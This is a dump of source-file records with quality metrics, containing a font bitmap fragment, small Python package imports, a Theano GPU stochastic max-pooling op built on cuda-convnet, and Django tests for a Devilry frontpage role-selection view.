0x70,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x06,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x70,0x00, # Character 0x5d (93)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x80,0x4c,0x80,0x47,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5e (94)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x5f (95)
]
| 173.598039
| 185
| 0.77636
| 3,367
| 17,707
| 4.082863
| 0.06831
| 0.55343
| 0.683495
| 0.772823
| 0.840038
| 0.787881
| 0.772678
| 0.731796
| 0.655343
| 0.612134
| 0
| 0.552816
| 0.033377
| 17,707
| 101
| 186
| 175.316832
| 0.250351
| 0.10781
| 0
| 0.02
| 0
| 0
| 0
| 0
| 0
| 1
| 0.782625
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
d88bad9a0eeab66cf4c34590d60f0c4f53dd5b75
| 207
|
py
|
Python
|
pinnacle/endpoints/__init__.py
|
miikama/pinnacle
|
ecf9a839f526ca78c54199c7c2bdb630e2b28ebc
|
[
"MIT"
] | 54
|
2017-07-12T22:52:19.000Z
|
2022-01-16T11:04:02.000Z
|
pinnacle/endpoints/__init__.py
|
miikama/pinnacle
|
ecf9a839f526ca78c54199c7c2bdb630e2b28ebc
|
[
"MIT"
] | 16
|
2017-08-22T15:50:47.000Z
|
2022-03-08T14:41:19.000Z
|
pinnacle/endpoints/__init__.py
|
miikama/pinnacle
|
ecf9a839f526ca78c54199c7c2bdb630e2b28ebc
|
[
"MIT"
] | 32
|
2017-07-21T17:14:36.000Z
|
2022-02-21T18:19:43.000Z
|
from pinnacle.endpoints.account import Account
from pinnacle.endpoints.betting import Betting
from pinnacle.endpoints.marketdata import MarketData
from pinnacle.endpoints.referencedata import ReferenceData
| 34.5
| 58
| 0.879227
| 24
| 207
| 7.583333
| 0.333333
| 0.263736
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082126
| 207
| 5
| 59
| 41.4
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d8a749e4184075545c76ca3d61faf61ab690f683
| 122
|
py
|
Python
|
mafia_resources/db/__init__.py
|
whiteRa2bit/backend_app
|
c91cfe4791f5f0ec4d1f2dbb7ac8fa73a09b067e
|
[
"Unlicense",
"MIT"
] | null | null | null |
mafia_resources/db/__init__.py
|
whiteRa2bit/backend_app
|
c91cfe4791f5f0ec4d1f2dbb7ac8fa73a09b067e
|
[
"Unlicense",
"MIT"
] | null | null | null |
mafia_resources/db/__init__.py
|
whiteRa2bit/backend_app
|
c91cfe4791f5f0ec4d1f2dbb7ac8fa73a09b067e
|
[
"Unlicense",
"MIT"
] | null | null | null |
from mafia_resources.db.utils import get_mongo_db, to_object_id
from mafia_resources.db.collection import MongoCollection
| 40.666667
| 63
| 0.885246
| 19
| 122
| 5.368421
| 0.684211
| 0.176471
| 0.352941
| 0.392157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07377
| 122
| 2
| 64
| 61
| 0.902655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99942ce8453070e86377e474436a61c95f5029c8
| 19,249
|
py
|
Python
|
pylearn2/sandbox/cuda_convnet/stochastic_pool.py
|
ikervazquezlopez/Pylearn2
|
2971e8f64374ffde572d4cf967aad5342beaf5e0
|
[
"BSD-3-Clause"
] | 2,045
|
2015-01-01T14:07:52.000Z
|
2022-03-08T08:56:41.000Z
|
pylearn2/sandbox/cuda_convnet/stochastic_pool.py
|
ikervazquezlopez/Pylearn2
|
2971e8f64374ffde572d4cf967aad5342beaf5e0
|
[
"BSD-3-Clause"
] | 305
|
2015-01-02T13:18:24.000Z
|
2021-08-20T18:03:28.000Z
|
pylearn2/sandbox/cuda_convnet/stochastic_pool.py
|
ikervazquezlopez/Pylearn2
|
2971e8f64374ffde572d4cf967aad5342beaf5e0
|
[
"BSD-3-Clause"
] | 976
|
2015-01-01T17:08:51.000Z
|
2022-03-25T19:53:17.000Z
|
"""
GPU op for Stochastic max pooling as defined in:
Stochastic Pooling for Regularization of Deep Convolutional Neural Networks
Matthew D. Zeiler, Rob Fergus, ICLR 2013
The code is written around Alex Krizhevsky's cuda-convnet
"""
__authors__ = "Mehdi Mirza"
__copyright__ = "Copyright 2010-2013, Universite de Montreal"
__credits__ = ["Mehdi Mirza", "David Warde-Farley"]
__license__ = "3-clause BSD"
__maintainer__ = "Mehdi Mirza"
__email__ = "mirzamom@iro"
import warnings
import numpy
from theano import shared
from theano.gof import Apply
from theano.sandbox.cuda import CudaNdarrayType
from theano.sandbox.cuda.basic_ops import as_cuda_ndarray_variable
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda import GpuOp
from theano.tensor import get_scalar_constant_value, NotScalarConstantError, zeros_like
from pylearn2.sandbox.cuda_convnet.base_acts import UnimplementedError
from pylearn2.sandbox.cuda_convnet.convnet_compile import convnet_available
from pylearn2.sandbox.cuda_convnet.convnet_compile import cuda_convnet_loc
from pylearn2.sandbox.cuda_convnet.shared_code import this_dir
from pylearn2.sandbox.cuda_convnet.pool import MaxPoolGrad
def stochastic_max_pool_c01b(c01b, pool_shape, pool_stride, start=0, seed=1234):
    """
    Apply GPU stochastic max pooling to a c01b-ordered tensor.

    Parameters
    ----------
    c01b : theano GPU variable
        4D tensor in (channel, image rows, image cols, batch) order.
    pool_shape : tuple of int
        (rows, cols) size of the pooling region; must be square because the
        underlying cuda-convnet kernel only supports square pools.
    pool_stride : tuple of int
        (rows, cols) stride between pooling regions; must be square.
    start : int, optional
        x,y offset in the image where pooling starts (see StochasticMaxPool).
    seed : int, optional
        Initial seed for the stochastic pooling RNG.

    Returns
    -------
    theano GPU variable
        The stochastically pooled tensor.
    """
    # The cuda-convnet kernel only handles square pooling windows/strides.
    assert pool_shape[0] == pool_shape[1]
    assert pool_stride[0] == pool_stride[1]
    op = StochasticMaxPool(pool_shape[0], pool_stride[0], start, seed)
    # The kernel requires C-contiguous input.
    c01b = gpu_contiguous(c01b)
    return op(c01b)
def weighted_max_pool_c01b(c01b, pool_shape, pool_stride, start=0):
    """
    Apply GPU weighted max pooling to a c01b-ordered tensor.

    Parameters
    ----------
    c01b : theano GPU variable
        4D tensor in (channel, image rows, image cols, batch) order.
    pool_shape : tuple of int
        (rows, cols) size of the pooling region; must be square because the
        underlying cuda-convnet kernel only supports square pools.
    pool_stride : tuple of int
        (rows, cols) stride between pooling regions; must be square.
    start : int, optional
        x,y offset in the image where pooling starts (see WeightedMaxPool).

    Returns
    -------
    theano GPU variable
        The pooled tensor.
    """
    # The cuda-convnet kernel only handles square pooling windows/strides.
    assert pool_shape[0] == pool_shape[1]
    assert pool_stride[0] == pool_stride[1]
    op = WeightedMaxPool(pool_shape[0], pool_stride[0], start)
    # The kernel requires C-contiguous input.
    c01b = gpu_contiguous(c01b)
    return op(c01b)
class StochasticMaxPool(GpuOp):
    """
    Stochastic MaxPool op code on the GPU.

    The input are in the order (channel, image rows, image cols, batch)

    Works only on square images and the grad works only when
    channel % 16 == 0.

    Parameters
    ----------
    ds : int
        defines the size of the pooling region in the x (equivalently, y)
        dimension. Squares of size (ds)2 get reduced to one value by this
        layer. There are no restrictions on the value of this parameter. It's
        fine for a pooling square to fall off the boundary of the image. Named
        SizeX in Alex's code.
    stride : int
        defines the stride size between successive pooling squares. Setting
        this parameter smaller than sizeX produces overlapping pools. Setting
        it equal to sizeX gives the usual, non-overlapping pools. Values
        greater than sizeX are not allowed.
    start : int, optional
        tells the net where in the input image to start the pooling (in x,y
        coordinates). In principle, you can start anywhere you want. Setting
        this to a positive number will cause the net to discard some pixels at
        the top and at the left of the image. Setting this to a negative number
        will cause it to include pixels that don't exist (which is fine).
        start=0 is the usual setting.
    outputs : int, optional
        allows you to control how many output values in the x (equivalently, y)
        dimension this operation will produce. This parameter is analogous to
        the start parameter, in that it allows you to discard some portion of
        the image by setting it to a value small enough to leave part of the
        image uncovered. Setting it to zero instructs the net to produce as
        many outputs as is necessary to ensure that the whole image is covered.
        default 0
    seed : int, optional
        initial value for the RNG used by the stochastic pooling kernel;
        stored on the GPU in a float32 shared variable that is incremented
        by one after every call (via ``default_update``).
    """

    def __init__(self, ds, stride, start=0, outputs=0, seed = 1234):
        self.ds = ds
        self.stride = stride
        self.start = start
        # Copying non-contiguous inputs is not implemented; c_code raises
        # UnimplementedError if this is ever set non-zero.
        self.copy_non_contiguous = 0
        # Seed lives on the device and advances after each function call so
        # successive calls draw different random pooling selections.
        self.seed_state = shared(numpy.asarray(seed).astype('float32'))
        self.seed_state.default_update = self.seed_state + 1
        assert stride > 0 and stride <= ds, (stride, ds)
        assert ds > 0, ds # We check in the code if ds <= imgSizeX

    def __eq__(self, other):
        """
        Two ops compare equal iff they have the same type and pooling
        geometry (ds, stride, start).
        """
        #Dont put copy_non_contigous as this doesn't change the output
        return (type(self) == type(other) and
                self.ds == other.ds and
                self.stride == other.stride and
                self.start == other.start)

    def __hash__(self):
        """
        Hash consistent with ``__eq__``: combines type and pooling geometry.
        """
        #Dont put copy_non_contigous as this doesn't change the output
        return (hash(type(self)) ^ hash(self.ds) ^
                hash(self.stride) ^ hash(self.start))

    def c_header_dirs(self):
        """
        Directories searched for the cuda-convnet headers.
        """
        return [this_dir]

    def c_headers(self):
        """
        C headers required by the generated code.
        """
        return ['nvmatrix.cuh', 'conv_util.cuh']

    def c_lib_dirs(self):
        """
        Directory that contains the compiled cuda_convnet library.
        """
        return [cuda_convnet_loc]

    def c_libraries(self):
        """
        Libraries the generated code links against.
        """
        return ['cuda_convnet']

    def c_code_cache_version(self):
        """
        Version tag for Theano's C-code compilation cache; bump when the
        generated C code changes.
        """
        return (1,)

    def _argument_contiguity_check(self, arg_name):
        """
        Return a C code fragment that raises ValueError when the argument
        named ``arg_name`` is not C-contiguous (doubly %-escaped because the
        result is substituted again in ``c_code``).
        """
        return """
        if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s))
        {
            if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) {
                PyErr_SetString(PyExc_ValueError,
                    "%(class)s: %(arg_name)s must be C contiguous");
                %%(fail)s;
            }
        }
        """ % {
            'class': self.__class__.__name__,
            'arg_name': arg_name,
            'class_name_caps': self.__class__.__name__.upper(),
        }

    def make_node(self, images):
        """
        Build the Apply node; inputs are the images plus the on-device seed
        shared variable, output is a 4D CudaNdarray.
        """
        images = as_cuda_ndarray_variable(images)
        assert images.ndim == 4
        channels_broadcastable = images.type.broadcastable[0]
        batch_broadcastable = images.type.broadcastable[3]
        # Pooling changes the row/col dims, so they can never be broadcastable.
        rows_broadcastable = False
        cols_broadcastable = False
        targets_broadcastable = (channels_broadcastable, rows_broadcastable,
                                 cols_broadcastable, batch_broadcastable)
        targets_type = CudaNdarrayType(broadcastable=targets_broadcastable)
        targets = targets_type()
        seed = self.seed_state
        seed = as_cuda_ndarray_variable(seed)
        return Apply(self, [images, seed], [targets])

    def c_code(self, node, name, inputs, outputs, sub):
        """
        Generate the C/CUDA code for the forward pass: validate the input,
        wrap it in an NVMatrix, allocate the output and call
        convLocalStochasticMaxPool.
        """
        images, seed = inputs
        targets, = outputs
        fail = sub['fail']
        # The amount of braces that must be closed at the end
        num_braces = 0
        if self.copy_non_contiguous:
            raise UnimplementedError()
        else:
            basic_setup = "#define STOCHASTICMAXPOOL_COPY_NON_CONTIGUOUS 0\n"
        # Convert images in nv_images, an NVMatrix, for compatibility
        # with the cuda-convnet functions
        setup_nv_images = self._argument_contiguity_check("images") + """
        if (%(images)s->nd != 4)
        {
            PyErr_Format(PyExc_ValueError,
                "images must have nd=4, got nd=%%i", %(images)s->nd);
            %(fail)s;
        }
        { //setup_nv_images brace 1
        const int * images_dims = CudaNdarray_HOST_DIMS(%(images)s);
        const int img_channels = images_dims[0];
        const int imgSizeY = images_dims[1];
        const int imgSizeX = images_dims[2];
        const int batch_size = images_dims[3];
        if(imgSizeY != imgSizeX){
            PyErr_Format(PyExc_ValueError,
                "images must be square(dims[1] == dims[2]). Shape (%%i,%%i,%%i,%%i)",
                img_channels, imgSizeY, imgSizeX, batch_size);
            %(fail)s;
        }
        if(%(ds)s > imgSizeY){
            PyErr_Format(PyExc_ValueError,
                "ds(%%d) must be <= imgSizeX(%%d) and imgSizeY(%%d).",
                %(ds)s, imgSizeX, imgSizeY);
            %(fail)s;
        }
        if(%(start)s >= imgSizeX){
            PyErr_Format(PyExc_ValueError,
                "start is %%d but must be smaller then the images size of %%d x %%d.",
                %(start)s, imgSizeX, imgSizeY);
            %(fail)s;
        }
        NVMatrix nv_images(%(images)s, img_channels * imgSizeY * imgSizeX, batch_size,
        "MaxPool:nv_images");
        //int * seed = CudaNdarray_HOST_DIMS%(seed)s;
        float * seed = CudaNdarray_DEV_DATA(%(seed)s);
        //int * seed = %(seed)s;
        """
        num_braces += 1
        setup_nv_targets = """
        //int _outputsX = int(ceil((dic['imgSize'] - dic['start'] - dic['sizeX']) / float(dic['stride']))) + 1;
        int _outputsX = ((int)(ceil((imgSizeY - %(start)s - %(ds)s) / ((float)%(stride)s)))) + 1;
        int target_dims [] = {
            img_channels,
            _outputsX,
            _outputsX,
            batch_size };
        if (CudaNdarray_prep_output(& %(targets)s, 4, target_dims))
        {
            %(fail)s;
        }
        { // setup_nv_target brace # 1
        NVMatrix nv_targets(%(targets)s, target_dims[0] * target_dims[1] * target_dims[2],
        target_dims[3], "MaxPool:nv_targets");
        """
        num_braces += 1
        do_pool = """
        convLocalStochasticMaxPool(nv_images, nv_targets, img_channels, %(ds)s,
        %(start)s, %(stride)s, _outputsX, MaxPooler(), seed);
        """
        braces = '}' * num_braces
        rval = (basic_setup +
                setup_nv_images +
                setup_nv_targets +
                do_pool +
                braces)
        # Bind the op attributes as locals so the %(ds)s / %(start)s /
        # %(stride)s placeholders resolve via locals() below.
        start = self.start
        stride = self.stride
        ds = self.ds
        rval = rval % locals()
        return rval

    def grad(self, inp, grads):
        """
        Gradient: route the output gradient through MaxPoolGrad; the seed
        input gets a zero gradient.

        NOTE(review): ``self(x)`` re-runs the stochastic pooling here, and
        the seed shared variable advances between calls, so the argmax used
        by MaxPoolGrad may differ from the forward pass's sample — confirm
        this resampling is intended.
        """
        x, seed = inp
        gz, = grads
        gz = gpu_contiguous(gz)
        maxout = self(x)
        return [MaxPoolGrad(self.ds, self.stride, self.start)(x, maxout, gz), zeros_like(seed)]

    # Make sure the cuda_convnet library is compiled and up-to-date
    def make_thunk(self, *args, **kwargs):
        """
        Refuse to build a thunk when the cuda_convnet library cannot be
        compiled; otherwise defer to the parent implementation.
        """
        if not convnet_available():
            raise RuntimeError('Could not compile cuda_convnet')
        return super(StochasticMaxPool, self).make_thunk(*args, **kwargs)
class WeightedMaxPool(GpuOp):
    """
    This op wrap Alex's MaxPool code on the GPU.

    The input are in the order (channel, image rows, image cols, batch)

    Works only on square images and the grad works only when
    channel % 16 == 0.

    Parameters
    ----------
    ds : int
        defines the size of the pooling region in the x (equivalently, y)
        dimension. Squares of size (ds)2 get reduced to one value by this
        layer. There are no restrictions on the value of this parameter. It's
        fine for a pooling square to fall off the boundary of the image. Named
        SizeX in Alex's code.
    stride : int
        defines the stride size between successive pooling squares. Setting
        this parameter smaller than sizeX produces overlapping pools. Setting
        it equal to sizeX gives the usual, non-overlapping pools. Values
        greater than sizeX are not allowed.
    start : int, optional
        tells the net where in the input image to start the pooling (in x,y
        coordinates). In principle, you can start anywhere you want. Setting
        this to a positive number will cause the net to discard some pixels at
        the top and at the left of the image. Setting this to a negative number
        will cause it to include pixels that don't exist (which is fine).
        start=0 is the usual setting.
    outputs : int, optional
        allows you to control how many output values in the x (equivalently, y)
        dimension this operation will produce. This parameter is analogous to
        the start parameter, in that it allows you to discard some portion of
        the image by setting it to a value small enough to leave part of the
        image uncovered. Setting it to zero instructs the net to produce as
        many outputs as is necessary to ensure that the whole image is covered.
        default 0
    """

    def __init__(self, ds, stride, start=0, outputs=0):
        self.ds = ds
        self.stride = stride
        self.start = start
        # Copying non-contiguous inputs is not implemented; c_code raises
        # UnimplementedError if this is ever set non-zero.
        self.copy_non_contiguous = 0
        assert stride > 0 and stride <= ds, (stride, ds)
        assert ds > 0, ds # We check in the code if ds <= imgSizeX

    def __eq__(self, other):
        """
        Two ops compare equal iff they have the same type and pooling
        geometry (ds, stride, start).
        """
        #Dont put copy_non_contigous as this doesn't change the output
        return (type(self) == type(other) and
                self.ds == other.ds and
                self.stride == other.stride and
                self.start == other.start)

    def __hash__(self):
        """
        Hash consistent with ``__eq__``: combines type and pooling geometry.
        """
        #Dont put copy_non_contigous as this doesn't change the output
        return (hash(type(self)) ^ hash(self.ds) ^
                hash(self.stride) ^ hash(self.start))

    def c_header_dirs(self):
        """
        Directories searched for the cuda-convnet headers.
        """
        return [this_dir]

    def c_headers(self):
        """
        C headers required by the generated code.
        """
        return ['nvmatrix.cuh', 'conv_util.cuh']

    def c_lib_dirs(self):
        """
        Directory that contains the compiled cuda_convnet library.
        """
        return [cuda_convnet_loc]

    def c_libraries(self):
        """
        Libraries the generated code links against.
        """
        return ['cuda_convnet']

    def c_code_cache_version(self):
        """
        Version tag for Theano's C-code compilation cache; bump when the
        generated C code changes.
        """
        return (1,)

    def _argument_contiguity_check(self, arg_name):
        """
        Return a C code fragment that raises ValueError when the argument
        named ``arg_name`` is not C-contiguous (doubly %-escaped because the
        result is substituted again in ``c_code``).
        """
        return """
        if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s))
        {
            if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) {
                PyErr_SetString(PyExc_ValueError,
                    "%(class)s: %(arg_name)s must be C contiguous");
                %%(fail)s;
            }
        }
        """ % {
            'class': self.__class__.__name__,
            'arg_name': arg_name,
            'class_name_caps': self.__class__.__name__.upper(),
        }

    def make_node(self, images):
        """
        Build the Apply node; the single input is the images tensor, the
        output is a 4D CudaNdarray.
        """
        images = as_cuda_ndarray_variable(images)
        assert images.ndim == 4
        channels_broadcastable = images.type.broadcastable[0]
        batch_broadcastable = images.type.broadcastable[3]
        # Pooling changes the row/col dims, so they can never be broadcastable.
        rows_broadcastable = False
        cols_broadcastable = False
        targets_broadcastable = (channels_broadcastable, rows_broadcastable,
                                 cols_broadcastable, batch_broadcastable)
        targets_type = CudaNdarrayType(broadcastable=targets_broadcastable)
        targets = targets_type()
        return Apply(self, [images], [targets])

    def c_code(self, node, name, inputs, outputs, sub):
        """
        Generate the C/CUDA code for the forward pass: validate the input,
        wrap it in an NVMatrix, allocate the output and call
        convLocalWeightedPool.
        """
        images, = inputs
        targets, = outputs
        fail = sub['fail']
        # The amount of braces that must be closed at the end
        num_braces = 0
        if self.copy_non_contiguous:
            raise UnimplementedError()
        else:
            basic_setup = "#define WEIGHTEDMAXPOOL_COPY_NON_CONTIGUOUS 0\n"
        # Convert images in nv_images, an NVMatrix, for compatibility
        # with the cuda-convnet functions
        setup_nv_images = self._argument_contiguity_check("images") + """
        if (%(images)s->nd != 4)
        {
            PyErr_Format(PyExc_ValueError,
                "images must have nd=4, got nd=%%i", %(images)s->nd);
            %(fail)s;
        }
        { //setup_nv_images brace 1
        const int * images_dims = CudaNdarray_HOST_DIMS(%(images)s);
        const int img_channels = images_dims[0];
        const int imgSizeY = images_dims[1];
        const int imgSizeX = images_dims[2];
        const int batch_size = images_dims[3];
        if(imgSizeY != imgSizeX){
            PyErr_Format(PyExc_ValueError,
                "images must be square(dims[1] == dims[2]). Shape (%%i,%%i,%%i,%%i)",
                img_channels, imgSizeY, imgSizeX, batch_size);
            %(fail)s;
        }
        if(%(ds)s > imgSizeY){
            PyErr_Format(PyExc_ValueError,
                "ds(%%d) must be <= imgSizeX(%%d) and imgSizeY(%%d).",
                %(ds)s, imgSizeX, imgSizeY);
            %(fail)s;
        }
        if(%(start)s >= imgSizeX){
            PyErr_Format(PyExc_ValueError,
                "start is %%d but must be smaller then the images size of %%d x %%d.",
                %(start)s, imgSizeX, imgSizeY);
            %(fail)s;
        }
        NVMatrix nv_images(%(images)s, img_channels * imgSizeY * imgSizeX, batch_size,
        "MaxPool:nv_images");
        """
        num_braces += 1
        setup_nv_targets = """
        //int _outputsX = int(ceil((dic['imgSize'] - dic['start'] - dic['sizeX']) / float(dic['stride']))) + 1;
        int _outputsX = ((int)(ceil((imgSizeY - %(start)s - %(ds)s) / ((float)%(stride)s)))) + 1;
        int target_dims [] = {
            img_channels,
            _outputsX,
            _outputsX,
            batch_size };
        if (CudaNdarray_prep_output(& %(targets)s, 4, target_dims))
        {
            %(fail)s;
        }
        { // setup_nv_target brace # 1
        NVMatrix nv_targets(%(targets)s, target_dims[0] * target_dims[1] * target_dims[2],
        target_dims[3], "MaxPool:nv_targets");
        """
        num_braces += 1
        do_pool = """
        convLocalWeightedPool(nv_images, nv_targets, img_channels, %(ds)s,
        %(start)s, %(stride)s, _outputsX, MaxPooler());
        """
        braces = '}' * num_braces
        rval = (basic_setup +
                setup_nv_images +
                setup_nv_targets +
                do_pool +
                braces)
        # Bind the op attributes as locals so the %(ds)s / %(start)s /
        # %(stride)s placeholders resolve via locals() below.
        start = self.start
        stride = self.stride
        ds = self.ds
        rval = rval % locals()
        return rval

    def grad(self, inp, grads):
        """
        Gradient is not implemented for this op.
        """
        raise NotImplementedError()

    # Make sure the cuda_convnet library is compiled and up-to-date
    def make_thunk(self, node, storage_map, compute_map, no_recycling):
        """
        Refuse to build a thunk when the cuda_convnet library cannot be
        compiled; otherwise defer to the parent implementation.
        """
        if not convnet_available():
            raise RuntimeError('Could not compile cuda_convnet')
        return super(WeightedMaxPool, self).make_thunk(
            node, storage_map, compute_map, no_recycling)
| 31.147249
| 111
| 0.574679
| 2,288
| 19,249
| 4.653409
| 0.147727
| 0.026862
| 0.016906
| 0.019724
| 0.871231
| 0.857706
| 0.857706
| 0.833474
| 0.824082
| 0.817883
| 0
| 0.010367
| 0.323497
| 19,249
| 617
| 112
| 31.197731
| 0.807249
| 0.259182
| 0
| 0.751592
| 0
| 0.025478
| 0.418065
| 0.088501
| 0
| 0
| 0
| 0.042139
| 0.031847
| 1
| 0.089172
| false
| 0
| 0.044586
| 0
| 0.219745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
41f3ace55a0d3832bc5f1012b643cb346ed41067
| 5,917
|
py
|
Python
|
devilry/devilry_frontpage/tests/test_frontpage.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_frontpage/tests/test_frontpage.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_frontpage/tests/test_frontpage.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
from django.conf import settings
from django.test import TestCase
from django_cradmin import cradmin_testhelpers
from model_mommy import mommy
from devilry.devilry_account.models import PermissionGroup
from devilry.devilry_frontpage.views import frontpage
class TestFrontpage(TestCase, cradmin_testhelpers.TestCaseMixin):
    """
    Tests for the frontpage role-selection view.

    Each test creates a user with a given role, renders the frontpage as
    that user and asserts which role-select entries
    (student / examiner / anyadmin) and links the page contains.
    """
    viewclass = frontpage.FrontpageView

    # Selector template for one role-select list item; formatted with the
    # role name ('student', 'examiner' or 'anyadmin').
    _role_selector_template = '.devilry-frontpage-listbuilder-roleselect-itemvalue-{}'
    # Link only shown to superusers.
    _superuser_link_selector = '.devilry-frontpage-superuser-link'

    def _mock_getrequest_as(self, testuser):
        """GET the frontpage as ``testuser``; return the mocked html response."""
        return self.mock_http200_getrequest_htmls(requestuser=testuser)

    def _assert_visible_roles(self, mockresponse, student=False, examiner=False,
                              anyadmin=False):
        """Assert exactly which role-select entries the response renders."""
        for role, expected in (('student', student),
                               ('examiner', examiner),
                               ('anyadmin', anyadmin)):
            css_selector = self._role_selector_template.format(role)
            if expected:
                self.assertTrue(mockresponse.selector.exists(css_selector))
            else:
                self.assertFalse(mockresponse.selector.exists(css_selector))

    def _make_subjectadmin_user(self, grouptype):
        """Create a user that is member of a SubjectPermissionGroup of ``grouptype``."""
        testuser = mommy.make(settings.AUTH_USER_MODEL)
        mommy.make('devilry_account.PermissionGroupUser', user=testuser,
                   permissiongroup=mommy.make(
                       'devilry_account.SubjectPermissionGroup',
                       permissiongroup__grouptype=grouptype).permissiongroup)
        return testuser

    def test_title(self):
        testuser = mommy.make(settings.AUTH_USER_MODEL)
        mockresponse = self._mock_getrequest_as(testuser)
        self.assertEqual('Devilry frontpage',
                         mockresponse.selector.one('title').alltext_normalized)

    def test_h1(self):
        testuser = mommy.make(settings.AUTH_USER_MODEL)
        mockresponse = self._mock_getrequest_as(testuser)
        self.assertEqual('Choose your role',
                         mockresponse.selector.one('h1').alltext_normalized)

    def test_user_is_student(self):
        testuser = mommy.make(settings.AUTH_USER_MODEL)
        mommy.make('core.Candidate',
                   relatedstudent__user=testuser,
                   assignment_group__parentnode=mommy.make_recipe(
                       'devilry.apps.core.assignment_activeperiod_start'))
        mockresponse = self._mock_getrequest_as(testuser)
        self._assert_visible_roles(mockresponse, student=True)

    def test_user_is_examiner(self):
        testuser = mommy.make(settings.AUTH_USER_MODEL)
        mommy.make('core.Examiner',
                   relatedexaminer__user=testuser,
                   assignmentgroup__parentnode=mommy.make_recipe(
                       'devilry.apps.core.assignment_activeperiod_start'))
        mockresponse = self._mock_getrequest_as(testuser)
        self._assert_visible_roles(mockresponse, examiner=True)

    def test_user_is_superuser(self):
        testuser = mommy.make(settings.AUTH_USER_MODEL, is_superuser=True)
        mockresponse = self._mock_getrequest_as(testuser)
        self._assert_visible_roles(mockresponse, anyadmin=True)
        # Only superusers get the direct link to the superuser UI.
        self.assertTrue(mockresponse.selector.exists(self._superuser_link_selector))

    def test_user_is_departmentadmin(self):
        testuser = self._make_subjectadmin_user(
            PermissionGroup.GROUPTYPE_DEPARTMENTADMIN)
        mockresponse = self._mock_getrequest_as(testuser)
        self._assert_visible_roles(mockresponse, anyadmin=True)
        self.assertFalse(mockresponse.selector.exists(self._superuser_link_selector))

    def test_user_is_subjectadmin(self):
        testuser = self._make_subjectadmin_user(
            PermissionGroup.GROUPTYPE_SUBJECTADMIN)
        mockresponse = self._mock_getrequest_as(testuser)
        self._assert_visible_roles(mockresponse, anyadmin=True)
        self.assertFalse(mockresponse.selector.exists(self._superuser_link_selector))

    def test_user_is_periodadmin(self):
        testuser = mommy.make(settings.AUTH_USER_MODEL)
        mommy.make('devilry_account.PermissionGroupUser', user=testuser,
                   permissiongroup=mommy.make(
                       'devilry_account.PeriodPermissionGroup').permissiongroup)
        mockresponse = self._mock_getrequest_as(testuser)
        self._assert_visible_roles(mockresponse, anyadmin=True)
        self.assertFalse(mockresponse.selector.exists(self._superuser_link_selector))
| 56.894231
| 117
| 0.726382
| 555
| 5,917
| 7.571171
| 0.136937
| 0.091385
| 0.136126
| 0.172775
| 0.836982
| 0.836982
| 0.836982
| 0.834603
| 0.824607
| 0.824607
| 0
| 0.005352
| 0.178976
| 5,917
| 103
| 118
| 57.446602
| 0.859613
| 0
| 0
| 0.663043
| 0
| 0
| 0.267872
| 0.256549
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.086957
| false
| 0
| 0.065217
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
